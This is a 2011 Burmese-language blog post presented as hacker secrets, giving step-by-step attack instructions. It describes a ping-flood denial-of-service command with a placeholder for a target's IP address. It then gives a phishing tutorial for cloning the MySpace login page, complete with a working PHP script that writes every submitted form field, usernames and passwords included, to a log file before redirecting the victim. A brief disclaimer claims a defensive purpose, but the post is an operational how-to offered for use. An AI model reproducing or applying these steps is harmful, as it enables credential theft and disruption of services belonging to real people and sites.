Thursday, 20 October 2011

ဟက္ကာမ်ားရဲ႕ လွ်ဳိ႕ဝွက္ခ်က္မ်ား

- Dos Attack ဆိုတာ Denial of Service Attack ကို ဆိုလိုျခင္း ျဖစ္ပါတယ္။
ကိုယ္တိုက္္ခိုက္လိုေသာသူ၏ services မ်ားကို ပိတ္ပင္ျခင္း တနည္းအားျဖင့္ သူ၏ လုပ္ငန္းမ်ား ဆက္လက္ မလုပ္ေဆာင္ႏိုင္ေအာင္ ရပ္ဆိုင္းပစ္ျခင္းတို႔ကို ဆိုလိုပါတယ္။
- End-user systems, servers, routers နဲ႕ Website စတာေတြကို တိုက္ခိုက္ႏိုင္ပါတယ္။
- တိုက္ခိုက္ဖို႔အတြက္ လိုအပ္ခ်က္မ်ားကေတာ့
၁. Command Prompt (CMD or DOS) windows system မွာ ပါလာၿပီးသား ျဖစ္ပါတယ္။
၂. တိုက္ခိုက္လိုေသာ ကြန္ပ်ဳဳတာ သို႕ website ၏ IP address
- Website ၏ IP address ကို ဘယ္လိုရႏိုင္မလည္းဆိုရင္
၁. CMD ကိုဖြင့္ပါ
၂. Nslookup website name ရိုက္ထည္႕ပါ (ဥပမာ- nslookup www.google.com)
၃. Website ၏ IP addresss က်လာပါလိမ့္မည္။
- စတင္တိုက္ခိုက္ျခင္း
၁. CMD ကိုဖြင့္ပါ။
၂. Ping Site-IP -l 65500 –n 10000000 –w 0.00001 လို႕ရိုက္ထည္႕ပါ။ (Site-IP ေနရာတြင္တိုက္ခိုက္
လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address ကိုရိုက္ထည္႕ရပါမည္။)
Site-IP = ေနရာတြင္တိုက္ခိုက္ လိုသည္႕ကြန္ပ်ဳဳတာ (သို႕) website ၏ IP address
ကိုရိုက္ထည္႕ရပါမည္။
-n 10000000 = အႀကိမ္10000000 တိုက္ခိုက္မည္ဟု ေျပာျခင္းျဖစ္သည္။ အႀကိမ္အေရအတြက္ကို ေျပာင္းလဲႏိုင္ပါတယ္။
-w 0.00001 = တႀကိမ္တိုက္ခိုက္ၿပီးေနာက္ ဘယ္ေလာက္ၾကာရင္ ေနာက္တခါ ထပ္တိုက္ခိုက္မွာလည္းကို ေျပာျခင္းပါတယ္။
သတိျပဳရမွာကေတာ့ -l, -n နဲ႕ -w ေတြကို ျဖဳတ္ၿပီးသုံးရင္ တိုက္ခိုက္ႏိုင္မွာ မဟုတ္ပါဘူး။
- အခုလို တိုက္ခိုက္ျခင္းကို “PING OF DEATH” လို႕လည္းေခၚပါတယ္ ။

အခုေျပာမွာက Myspace Webpage အတုဖန္တီးမွာျဖစ္ပါတယ္။ တစုံတဦးကို နစ္နာလိုေသာ ရည္ရြယ္ခ်က္ မရိွပါ။ နည္းပညာကို ပိုစိတ္၀င္စားလာေစရန္ႏွင့္ ကာကြယ္တတ္ရန္အတြက္သာ ျဖစ္ပါသည္။

Phishing ဆိုတာဘာလည္း ?
Web site အတုေတြကို ဖန္တီးတာေပါ့။ Identify theft ဆိုရင္လည္း မမွားပါဘူး

Web site အတုဆိုတာကို နားမလည္ဘူး?
Web site အတုဆိုတာ နာမည္ႀကီးတဲ့ website ေတြကို သူ႕ပုံစံအတိုင္း ဖန္တီးထားတာဘဲ ျဖစ္ပါတယ္။

ဘာလို႔ ဖန္တီးတာလည္း ?
ဥပမာ ေျပာရရင္ gmail ပုံစံ site တခု ဖန္တီးလိုက္မယ္ဆိုပါစို႕…
အဲဒီ web site အတုနဲ႕သြား၀င္မိရင္ ကိုယ့္ gmail user name နဲ႕ password ေတြပါသြားၿပီေပါ့...

ဘယ္လို ဖန္တီးမွာလည္း ?
၁။ ပထမဆုံး website အတု ဖန္တီးခ်င္တဲ့ တကယ့္ site ကိုသြားပါ။
MySpace site ကို ဖန္တီးခ်င္တယ္ ဆိုပါစို႕ http://myspace.com ကိုသြားပါ။

၂။ Webpage ရဲ႕ source ကို ၾကည္႕ပါ။ ေနာက္ၿပီး copy လုပ္ပါ။

၃။ အခုသင့္မွာ webpage ရဲ႕ source ရိွေနၿပီဆိုရင္… အဲဒါေတြကို web hosting တစ္ခုခုမွာတင္လိုက္ပါ
အဲဒီ hosting ဟာ php enable ျဖစ္ရပါမယ္။

၄။ Web hosting မွာတင္ၿပီး index.html ဆိုတဲ့ file အေနနဲ႕ save လုပ္ပါ။
Index.html နဲ႕ save လိုက္ရင္ default home page ျဖစ္သြားမွာမို႕လို႕ပါ။

၅။ Php script တခု တည္ေဆာက္ပါမယ္။ ဘာလို႔လည္းဆိုရင္ သင့္ webpage အတြက္ log file တခု ဖန္တီးခ်င္လို႔ရယ္၊ ေနာက္ၿပီး တကယ့္ website ကို လမ္းေၾကာင္းေျပာင္းသြားဖို႔အတြက္ပါ။

၆။ Notepad ကို ဖြင့္ပါ log.txt ဆိုတဲ့ file name နဲ႕ save လုပ္ပါ။
Index.html ကို upload လုပ္ထားတဲ့ site မွာဘဲသြားၿပီး upload လုပ္ပါ။

၇။ Php script နဲ႕ပတ္သက္လို႔ ေလ့လာခ်င္ရင္ေတာ့ ဒီ site ေတြကို သြားပါ။
www.tizag.com, www.w3schools.com, မွာ သြားေရာက္ေလ့လာႏိုင္ပါတယ္။


header (’Location: http://myspace.com ‘);
$handle = fopen(”log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

၇။ အေပၚကျပထားတဲ့ code ေတြကို Notepad ေပၚမွာေရးခ်ၿပီး redirect.php ဆိုတဲ့နာမည္နဲ႕ သိမ္းလိုက္ပါ
ေနာက္ upload လုပ္ပါ။

၈။ Index.html မွာ ျပင္စရာေလးေတြ က်န္ေနေသးပါတယ္။ ဒီေတာ့ index.html ကို notepad နဲ႕ဖြင့္ပါ။
action= ကိုရွာပါ။ action နဲ႕ ပတ္သက္တာေတြက အမ်ားႀကီးပါ အဓိကလိုခ်င္တာက user name နဲ႕ password ေတြကို ဘယ္မွာသြားၾကည္႕ တယ္ဆိုတဲ့လမ္းေၾကာင္းကိုသိခ်င္တာပါ။ ဒီမွာေတာ့ E-mail ဆိုတဲ့ နာမည္ေလးနဲ႕ဘဲ index file ထဲမွာ ထပ္ရွာလိုက္ပါအုန္း။

၉။ action ထဲမွာ ပါ၀င္တဲ့ စာသားေတြကို ဖ်က္ၿပီး။ redirect.php ကို အစားထိုးပါ။

အခုဆိုရင္ေတာ့သင္ဟာ webpage အတု တစ္ခုကို တည္ေဆာက္ၿပီးသြားပါၿပီ……..။

0 comments:

Post a Comment